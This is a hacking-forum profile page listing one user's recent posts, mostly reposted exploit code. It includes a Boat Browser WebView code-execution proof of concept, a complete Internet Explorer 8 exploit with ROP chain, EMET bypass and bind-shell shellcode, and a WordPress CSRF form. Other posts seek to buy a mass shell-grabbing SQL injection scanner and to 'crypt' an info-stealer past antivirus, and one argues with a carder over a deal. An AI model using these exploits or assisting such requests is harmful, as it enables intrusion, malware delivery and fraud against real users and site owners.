Jump to content

sensi

Active Members
  • Posts

    574
  • Joined

  • Last visited

  • Days Won

    3

sensi last won the day on June 8 2014

sensi had the most liked content!

1 Follower

About sensi

  • Birthday 10/31/1970

Converted

  • Occupation
    Pentesting
  • Location
    inurl

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

sensi's Achievements

Newbie

Newbie (1/14)

132

Reputation

  1. Daca stiam ca esti gunoiul (carderul) la care i-am returnat cei $50 nici nu mai complicam cu tine. Cum sa generez 500k mailuri ma copac? Cand ai intrat cu tv si ai vazut mailurile erau ok, nu? Acum ca nu ai prins nimic prin promovarea "" site-ului (sa nu-i zic scam) ai venit sa faci pe prostu? Cand ajung acasa incercam sa rezolvam problema, dar cam dificil cu tine. Oricum banii nu-i mai am , so, nu te gandi la returnare ( ca data trecuta). Scuzati eventualele greseli gramaticale, cam nasol de pe tel si baterua-i moarta.
  2. @marius4fun25, nu folosesc IQC, ti-am dat pm cu jabber. -- Up!
  3. <!-- .:: Remote code execution vulnerability in Boat Browser ::. credit: c0otlass social contact: https://twitter.com/c0otlass mail: c0otlass@gmail.com CVE reserved : 2014-4968 time of discovery: July 14, 2014 Browser Official site:http://www.boatmob.com/ Browser download link:https://play.google.com/store/apps/details?id=com.boatbrowser.free&hl=en version Affected : In 8.0 and 8.0.1 tested , Android 3.0 through 4.1.x Risk rate: High vulnerability Description impact: The WebView class and use of the WebView.addJavascriptInterface method has vulnerability which cause remote code in html page run in android device a related issue to CVE-2012-6636 proof of concept: //..............................................poc.hmtl............................................ --> <!DOCTYPE html> <html> <head> <meta charset="UFT-8"> <title>CreatMalTxt POC - WebView</title> <script> var obj; function TestVulnerability() { temp="not"; var myObject = window; for (var name in myObject) { if (myObject.hasOwnProperty(name)) { try { temp=myObject[name].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null); } catch(e) { } } } if(temp=="not") { document.getElementById("log").innerHTML="this browser has been patched"; } else{ document.getElementById("log").innerHTML = "This browser is exploitabale" + "<br>" + " the poc file hase been created in sdcard ...<br>" ; document.getElementById("log").innerHTML += "we could see proccess information"+ temp.exec(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']); } } </script> </head> <body > <h3>CreatMalTxt POC</h3> <input value="Test Vulnerability" type="button" onclick="TestVulnerability();" /> <div id="log"></div> </body> </html> <!-- Solution: https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/ http://www.programering.com/a/MDM3YzMwATc.html https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614 References: http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/ https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/ http://50.56.33.56/blog/?p=314 https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/ https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py --> source
  4. Chiar daca cei de la vbulletin nu merita raportul, trebuie apreciat gestul tau. Felicitari! // Cat a timp durat pana ai gasit 0day-ul? Plt, nu ai zis nimanui ca mai e vbulletin 5 pe server, ne bagam si noi.
  5. Salut, caut ceva (shell scanner/exploit/crawler) cu care pot face rost de shell-uri, aici ma refer la o "cantitate" mai mare. Ma gandeam la un script care gaseste site-uri vulnerabile SQLi prin dork-uri si sa urce shell prin f. into outfile, sau o alta metoda mai ingenioasa ca sa zic asa. Stiu ca pentru wordpress (o versiune mai veche) exista un exploit. Cei care detin un astfel de "scanner" sau cum vreti voi sa-l numiti, rog sa ma contacteze cu un ID si suma stabilita.
  6. <!-- ** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass ** Offensive Security Research Team ** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet ** Affected Software: Internet Explorer 8 ** Vulnerability: Fixed Col Span ID ** CVE: CVE-2012-1876 ** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X --> <html> <body> <div id="evil"></div> <table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table> <script language='javascript'> function strtoint(str) { return str.charCodeAt(1)*0x10000 + str.charCodeAt(0); } var free = "EEEE"; while ( free.length < 500 ) free += free; var string1 = "AAAA"; while ( string1.length < 500 ) string1 += string1; var string2 = "BBBB"; while ( string2.length < 500 ) string2 += string2; var fr = new Array(); var al = new Array(); var bl = new Array(); var div_container = document.getElementById("evil"); div_container.style.cssText = "display:none"; for (var i=0; i < 500; i+=2) { fr[i] = free.substring(0, (0x100-6)/2); al[i] = string1.substring(0, (0x100-6)/2); bl[i] = string2.substring(0, (0x100-6)/2); var obj = document.createElement("button"); div_container.appendChild(obj); } for (var i=200; i<500; i+=2 ) { fr[i] = null; CollectGarbage(); } function heapspray(cbuttonlayout) { CollectGarbage(); var rop = cbuttonlayout + 4161; // RET var rop = rop.toString(16); var rop1 = rop.substring(4,8); var rop2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 11360; // POP EBP var rop = rop.toString(16); var rop3 = rop.substring(4,8); var rop4 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 111675; // XCHG EAX,ESP var rop = rop.toString(16); var rop5 = rop.substring(4,8); var rop6 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12377; // POP EBX var rop = rop.toString(16); var rop7 = rop.substring(4,8); var rop8 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 642768; // POP EDX var rop = rop.toString(16); var rop9 = rop.substring(4,8); var rop10 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12201; // POP ECX --> Changed var rop = rop.toString(16); var rop11 = rop.substring(4,8); var rop12 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 5504544; // Writable location var rop = rop.toString(16); var writable1 = rop.substring(4,8); var writable2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12462; // POP EDI var rop = rop.toString(16); var rop13 = rop.substring(4,8); var rop14 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12043; // POP ESI --> changed var rop = rop.toString(16); var rop15 = rop.substring(4,8); var rop16 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 63776; // JMP EAX var rop = rop.toString(16); var jmpeax1 = rop.substring(4,8); var jmpeax2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 85751; // POP EAX var rop = rop.toString(16); var rop17 = rop.substring(4,8); var rop18 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 4936; // VirtualProtect() var rop = rop.toString(16); var vp1 = rop.substring(4,8); var vp2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] var rop = rop.toString(16); var rop19 = rop.substring(4,8); var rop20 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 234657; // PUSHAD var rop = rop.toString(16); var rop21 = rop.substring(4,8); var rop22 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 408958; // PUSH ESP var rop = rop.toString(16); var rop23 = rop.substring(4,8); var rop24 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2228408; // POP ECX var rop = rop.toString(16); var rop25 = rop.substring(4,8); var rop26 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1586172; // POP EAX var rop = rop.toString(16); var rop27 = rop.substring(4,8); var rop28 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX] var rop = rop.toString(16); var rop29 = rop.substring(4,8); var rop30 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1884912; // PUSH EAX var rop = rop.toString(16); var rop31 = rop.substring(4,8); var rop32 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2140694; // ADD EAX,ECX var rop = rop.toString(16); var rop33 = rop.substring(4,8); var rop34 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX var rop = rop.toString(16); var rop35 = rop.substring(4,8); var rop36 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 5036248; // ADD ESP,0C var rop = rop.toString(16); var rop37 = rop.substring(4,8); var rop38 = rop.substring(0,4); // } RET var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW var getmodulew = getmodulew.toString(16); var getmodulew1 = getmodulew.substring(4,8); var getmodulew2 = getmodulew.substring(0,4); // } RET var getprocaddr = cbuttonlayout + 4836; // GetProcAddress var getprocaddr = getprocaddr.toString(16); var getprocaddr1 = getprocaddr.substring(4,8); var getprocaddr2 = getprocaddr.substring(0,4); // } RET var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING shellcode+= unescape("%u4141%u4141"); // PADDING shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN // EMET disable part 0x01 // Implement the Tachyon detection grid to overcome the Romulan cloaking device. shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u101C%u076d"); // EMET string shellcode+= unescape("%ue220%u0007"); // EMET offset shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u0000%u0000"); // Zero out ECX shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN shellcode+= unescape("%u"+rop37+"%u"+rop38); // ADD ESP,0C # RETN shellcode+= "EMET"; // EMET string shellcode+= unescape("%u0000%u0000"); // EMET string // EMET disable part 0x01 end // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain) shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP shellcode+= unescape("%u1024%u0000"); // Size 0x00001024 shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX shellcode+= unescape("%u0040%u0000"); // 0x00000040 shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect() shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX] shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP shellcode+= unescape("%u9090%u9090"); // NOPs // EMET disable part 0x02 // Execute the Corbomite bluff to disarm EAF shellcode+= unescape("%uc0b8%u6d10"); shellcode+= unescape("%u8b07%u8b00"); shellcode+= unescape("%u6800%u10c8"); shellcode+= unescape("%u076d%ud0ff"); shellcode+= unescape("%ud468%u6d10"); shellcode+= unescape("%u5007%uc4b8"); shellcode+= unescape("%u6d10%u8b07"); shellcode+= unescape("%u8b00%uff00"); shellcode+= unescape("%u8bd0%u81f0"); shellcode+= unescape("%uccec%u0002"); shellcode+= unescape("%uc700%u2404"); shellcode+= unescape("%u0010%u0001"); shellcode+= unescape("%ufc8b%uccb9"); shellcode+= unescape("%u0002%u8300"); shellcode+= unescape("%u04c7%ue983"); shellcode+= unescape("%u3304%uf3c0"); shellcode+= unescape("%u54aa%ufe6a"); shellcode+= unescape("%ud6ff%u9090"); shellcode+= unescape("%u9090%u9090"); // NOPs shellcode+= unescape("%u9090%u29eb"); // NOPs shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW shellcode+= unescape("%u"+getprocaddr1+"%u"+getprocaddr2); // GetProcAddress shellcode+= "NTDLL"; shellcode+= unescape("%u0000"); shellcode+= unescape("%u744e%u6553"); // NtSetContextThread shellcode+= unescape("%u4374%u6e6f"); shellcode+= unescape("%u6574%u7478"); shellcode+= unescape("%u6854%u6572"); shellcode+= unescape("%u6461%u0000"); shellcode+= unescape("%u9090%u9090"); // NOPs shellcode+= unescape("%u9090%u9090"); // NOPs // EMET disable part 0x02 end // Bind shellcode on 4444 // msf > generate -t js_le // windows/shell_bind_tcp - 342 bytes // http://www.metasploit.com // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= // I would keep the shellcode the same size for better reliability shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" + "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" + "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" + "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" + "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" + "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" + "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" + "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" + "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" + "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" + "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" + "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" + "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" + "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" + "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" + "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" + "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" + "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" + "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" + "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" + "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" + "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" + "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" + "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" + "%u006a%uff53%u41d5"); // Total spray should be 1000 var padding = unescape("%u9090"); while (padding.length < 1000) padding = padding + padding; var padding = padding.substr(0, 1000 - shellcode.length); shellcode+= padding; while (shellcode.length < 100000) shellcode = shellcode + shellcode; var onemeg = shellcode.substr(0, 64*1024/2); for (i=0; i<14; i++) { onemeg += shellcode.substr(0, 64*1024/2); } onemeg += shellcode.substr(0, (64*1024/2)-(38/2)); var spray = new Array(); for (i=0; i<100; i++) { spray[i] = onemeg.substr(0, onemeg.length); } } function leak(){ var leak_col = document.getElementById("132"); leak_col.width = "41"; leak_col.span = "19"; } function get_leak() { var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); str_addr = str_addr - 1410704; var hex = str_addr.toString(16); //alert(hex); setTimeout(function(){heapspray(str_addr)}, 50); } function trigger_overflow(){ var evil_col = document.getElementById("132"); evil_col.width = "1245880"; evil_col.span = "44"; } setTimeout(function(){leak()}, 400); setTimeout(function(){get_leak()},450); setTimeout(function(){trigger_overflow()}, 700); </script> </body> </html> source // Da ai dreptate, nu vazusem... defapt nici titlul nu-i chiar sugestiv. Rog un moderator sa mute/stearga topicul.
  7. UP! $456.34 (0.78026254) btc -> PP/transfer bancar.
  8. Vand 1,130.64 RON (0.61728395) Bitcoin, transfer bancar sau PP.
  9. Ii "corupta" arhiva. // nu vazusem, sorry.
  10. Salut, mai ofera careva servicii de "crypting"? Vreau sa-mi cryptez un stealer FUD, sa tina macar 3 zile. Care ma poate ajuta, rog sa ma contacteze pe PM.
  11. Intretinerea si dezvoltarea forum-ului. Subiectul asta a mai fost abordat... // am scris odata cu alexandruth
  12. # EXPLOIT TITLE:Wordpress 3.9.1-CSRF vulnerability # DATE:21st June,2014 # Author:Avinash Kumar Thapa #URL: localhost/wordpress/ #PATCH/FIX:Not fixed yet. ################################################################################################### Technical Details: This is the new version released by Wordpress. version is 3.9.1(Latest) ##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php## ##################################################################################################### Exploit Code: <html> <!-- CSRF PoC - generated by **Avinash Kumar Thapa** --> <body> <form action="http://localhost/wordpress/wp-comments-post.php" method="POST"> <input type="hidden" name="author" value="Anonymous" /> <input type="hidden" name="email" value="helloworld@outlook.com" /> <input type="hidden" name="url" value="www.random.com" /> <input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" /> <input type="hidden" name="submit" value="Post Comment" /> <input type="hidden" name="comment_post_ID" value="1" /> <input type="hidden" name="comment_parent" value="0" /> <input type="submit" value="Submit form" /> </form> </body> </html> ########################################################################################################### ---- -- Avinash a.k.a **SPID3R** twitter: @m_avinash143<https://twitter.com/m_avinash143> source
×
×
  • Create New...